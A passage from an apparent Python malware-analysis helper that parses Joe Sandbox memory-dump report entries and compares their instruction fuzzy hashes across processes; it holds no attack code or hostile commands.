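• Source File: 00000019.00000002.2724787391.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_7ffd9b6c0000_sv_chost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 851c54a2312dc6528416d5ca583d314354423ffa16f02a709317beb06db42396
• Instruction ID: c4a90eac45e168cbee9ce8c71fcd360534868703b429bc8247db7283d0c5ef1d
• Instruction Fuzzy Hash: 01319331B18A094FDB84FBA9C4B16FD77E1FF98300F9545B5D019D729ADE38A8018B40
Memory Dump Source
• Source File: 00000019.00000002.2724787391.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
• Snapshot File: hcaresult_25_2_7ffd9b6c0000_sv_chost.jbxd
• Opcode ID: 4be05781741098aa620241fd35a579681e0e31b946c0bee4c1f6968f8f117fdc
• Instruction ID: 1267c48b36b52e4b90e333b02293d0a41f36704f89793480b971e94df8756d96
• Instruction Fuzzy Hash: 01216722B0DA890FE791BB6CA8605747BD0EF96320B0901F6E95DCB1EBD818BD418381
Memory Dump Source
• Source File: 0000001A.00000002.2802112860.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
• Snapshot File: hcaresult_26_2_7ffd9b6c0000_sv_chost.jbxd
• Opcode ID: 6382dde9b5a5a05f94a9fdc2e58766defd6b7ce49ed03c189d37a646002daec8
• Instruction ID: 40fa6adf53d28e25ca7b989885685632a453ae841261763ea1e7162d08a6c223
• Instruction Fuzzy Hash: 5A318471B19A0D4FDB48FBACC4756BD77A1FF98300F9545B9D019D729ADE3868018740
Memory Dump Source
• Source File: 0000001A.00000002.2802112860.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
• Snapshot File: hcaresult_26_2_7ffd9b6c0000_sv_chost.jbxd
• Opcode ID: b1d754591e368796cf50c8e80e24404214bf7037c56d380a95f6e2232adb9e32
• Instruction ID: a527ced170b94cd499b29feb1fda54c87f161d637f1be3bc991a5d1ed50157a3
• Instruction Fuzzy Hash: A6217922F0DA890FE795BB6CA8605347BD0EF96320B0901FAE85DCB1E7DC18BD418381
"""

# "• Name: value" bullet lines; the value may be empty (API ID, String ID, ...).
FIELD_RE = re.compile(r"^\s*•\s*([A-Za-z ]+?):\s*(.*)$")
# Source File: <pid hex>.<field>.<digits>.<address>.<...>.sdmp, Offset: <hex>, based on PE: <bool>
SOURCE_RE = re.compile(
    r"^(?P<pid>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.\d+\.(?P<addr>[0-9A-Fa-f]{16})\.\S*\.sdmp"
    r",\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)"
)


@dataclass
class FunctionRecord:
    pid: int            # first dotted field of the .sdmp name, hex (00000019 -> 25)
    offset: str         # base address of the dumped region
    pe_backed: bool     # False: region not backed by a mapped PE image
    snapshot: str
    opcode_id: str
    instruction_id: str
    instruction_fuzzy: str


def _finish(fields):
    m = SOURCE_RE.match(fields["Source File"])
    if not m:
        raise ValueError("unrecognised Source File line: " + fields["Source File"])
    return FunctionRecord(
        pid=int(m.group("pid"), 16), offset=m.group("offset"),
        pe_backed=(m.group("pe") == "true"),
        snapshot=fields.get("Snapshot File", ""), opcode_id=fields.get("Opcode ID", ""),
        instruction_id=fields.get("Instruction ID", ""),
        instruction_fuzzy=fields.get("Instruction Fuzzy Hash", ""),
    )


def parse_records(text):
    """Split the report text into one FunctionRecord per 'Memory Dump Source' block."""
    records, current = [], {}
    for line in text.splitlines():
        if line.strip() == "Memory Dump Source":
            if current:
                records.append(_finish(current))
            current = {}
            continue
        m = FIELD_RE.match(line)
        if m:
            current[m.group(1)] = m.group(2).strip()
    if current:
        records.append(_finish(current))
    return records


def dump_summary(records):
    """Functions per (pid, base offset, PE-backed): shows which processes carry the same unbacked region."""
    counts = {}
    for r in records:
        key = (r.pid, r.offset, r.pe_backed)
        counts[key] = counts.get(key, 0) + 1
    return counts


def positional_similarity(a, b):
    """Fraction of equal characters at equal positions. Crude stand-in (assumption),
    NOT Joe Sandbox's similarity metric; equal-length hashes only."""
    if not a or not b or len(a) != len(b):
        return 0.0
    return sum(x == y for x, y in zip(a, b)) / len(a)


def cross_process_matches(records, threshold=0.75):
    """Pairs from different pids whose Instruction Fuzzy Hashes score >= threshold,
    as (pid_a, opcode_id_a, pid_b, opcode_id_b, score), best first."""
    out = []
    for r1, r2 in combinations(records, 2):
        if r1.pid == r2.pid:
            continue
        score = positional_similarity(r1.instruction_fuzzy, r2.instruction_fuzzy)
        if score >= threshold:
            out.append((r1.pid, r1.opcode_id, r2.pid, r2.opcode_id, round(score, 3)))
    return sorted(out, key=lambda t: -t[4])


if __name__ == "__main__":
    recs = parse_records(SAMPLE_REPORT)
    for (pid, off, pe), n in sorted(dump_summary(recs).items()):
        print(f"pid={pid} base={off} pe_backed={pe} functions={n}")
    for pa, ida, pb, idb, score in cross_process_matches(recs):
        print(f"pid {pa} {ida[:12]}... ~ pid {pb} {idb[:12]}... score={score}")
```

Two records from the same unbacked base address in different processes that pair up above 0.8 (here 4be05781... in process 25 against b1d75459... in process 26) are the ones to open first in the two snapshot files when confirming that both processes run the same unpacked code; swap positional_similarity for the real fuzzy-hash comparison once you know which algorithm the hashes come from.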